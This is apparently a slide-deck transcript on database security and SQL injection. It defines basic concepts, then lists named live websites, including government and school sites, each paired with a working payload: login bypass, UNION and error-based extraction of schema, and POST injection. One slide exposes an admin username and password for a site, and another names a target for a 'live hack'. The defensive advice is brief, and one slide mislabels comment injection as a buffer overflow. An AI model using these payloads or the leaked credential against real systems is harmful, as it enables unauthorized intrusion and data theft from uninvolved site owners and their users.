This document discusses database security and SQL injection attacks. It begins by defining databases and how they are interacted with through queries, stored procedures, and integration with programming languages. It then explains different types of database attacks like SQL injection, privilege escalation, and denial of service. Specific examples of SQL injection are provided, demonstrating how injection can occur through input values, errors, and POST requests. Methods for detecting and preventing SQL injection are discussed, including input validation, prepared statements, and firewalls. Live examples of SQL injection vulnerabilities are also shown.

2. DATABASE & DATABASE
SECURITY
BY
REHAN MANZOOR

3. What actually is a database
 Code and Filing concept
+

4. History of Database

5. Major Database Vendors

6. Interaction with Database

7. How we Interact (Direct
Queries)

8. Custom defined functions

9. Stored Procedures

10. Stored Procedures

11. Integration with Languages

12. Static Apps

13. Dynamic Apps

14. Need in CMS

15. How We Integrate
 Well that is the real question how we
integrate.. It create a problem when we don‘t
attach app with a database correctly.. Code
is important

16. Contents continued..
 Database Attacks
 What is a Database Attack
 Explanation
 OWASP Rating (damage rate)
 Destruction of SQL injection
 History Reviews
 Recent bidding in underground

17. Database Attacks
 Excessive Privileges
 Privileges abuse
 Unauthorized privilege elevation
 Platform Vulnerabilities
 Sql Injection
 Weak Audit
 Denial of Service

18. Top 10 vuln by OWASP

19. Destruction of SQL Injection
Attack
 Heartland Payment Systems
This New Jersey payment processing firm lost
data on tens of millions of credit cards in an
attack in 2009. Around 175,000 businesses
were affected by the theft.
 TJX
More than 45 million people had their credit card
details stolen and some experts said the actual
figure was likely to be closer to 94 million.

20. Recent Bidding in Underground

21. Login on Live Sites
 http://www.equinet.ch/fr/gestion/login.php
 1' OR '1'='1
 http://lionsclubofwashim.co.in/admin.php
 1' OR '1'='1
 admin.axilbusiness.in
 1' OR '1'='1
 http://www.anemos.in/admin/
 1' OR '1'='1
 Query Code
 CODE
select username, password from admin
where username='"+txtUserName.Text+"' and password='"+txtPassword.Text+"';

22. Union based attack
 http://greenforce.com.pk/page.aspx?page_id=24
+UNION+ALL+SELECT+null,null,@@version,null,null,null,nul
l-- -
 http://www.philatourism.com/page.aspx?id=-3 UNION ALL
SELECT table_name,null,null,null,null,null from
information_schema.tables—
 http://www.sharan.org.uk/newsdetail.aspx?ID=-7 union all
select '1',null –
 Code
select * from tblName where
id=‗‖+RequestQueryString[‗id‘]+‖‘;

23. Error Based Attack
 http://www.vdjs.edu.in/CMS/ContentPage.aspx?id=21 and @@version>1-- -
 http://www.mission-education.org/resourcelist.cfm?audience_ID=5 and
1=convert(int,@@version)-- -&category_id=2
 http://www.grabbbit.com/Product.aspx?console_id=3' and 1=convert(int,(select top 1
column_name from information_schema.columns where table_name='adminlogin'
and column_name not in ('id','userid','password','admin_role_id')))--&type=Preown
 http://www.grabbbit.com/admin/login.aspx
 userid admin
 password grabbbit$
 Code
 Select column1,column2,column3, from table1 join table2 on table1.column1 =
table2.column1 where id=‗‖+RequestQueryString[‗id‘]+‖‘;

24. Blind Attack
 fgcineplex.com.sg/Images/slideshow/sizzlings
oul.php
 Code
well query is same here like union but problem
is with labels here.. Their designer could are
not picked.. Either they are also stored in
database or they they cannot work with union

25. POST Sql Injection
 url:
 http://haryanapolice.gov.in/police/pressreleases/s
earch.asp
 Post
 text1=rummy'&text2=11/11/2010&SUBMIT=search
 Code
select * from tablename where text1=
Request.Form[―text1"].ToString() and text2=
Request.Form[―text1"].ToString();

26. Why Sql Injection Possible
 Who is responsible Database or Programmer
 Why Not To Blame Database
 Database Secure Nature
 Lack of awareness
 No research base study
 Lack of interest
 Non professional coders

27. Detection of SQL Injection
 Manual Check
 Why
 How
 By Whom
 Automated Check
 Tools
 Scanners

28. Securing From SQL Injection
 Learn About it
 Firewalls
 By Code
 Don‘t Disclose any parameter as possible
 Giving session user least possible rights
 Blacklisting evil keywords for the session user
 User input validation
 Using prepared statements

29. More on Firewalls
 USE Of Firewall
 As it is
 Customized
 Buffer overflows
 Null bytes
 Difference between a normal user and Hacker

30. Buffer Overflows
 Live example
 https://www.qmensolutions.com/remote_suppo
rt_packs.php?packs=9%27--%20-
 Bypassing from keyword

31. Live Hack Of A Website
 http://aquaservices.co.in/

32. Conclusion
 Although databases and their contents are
vulnerable to a host of internal and external
threats, it is possible to reduce the attack
vectors to near zero. By addressing these
threats you will meet the requirements of the
most regulated industries in the world.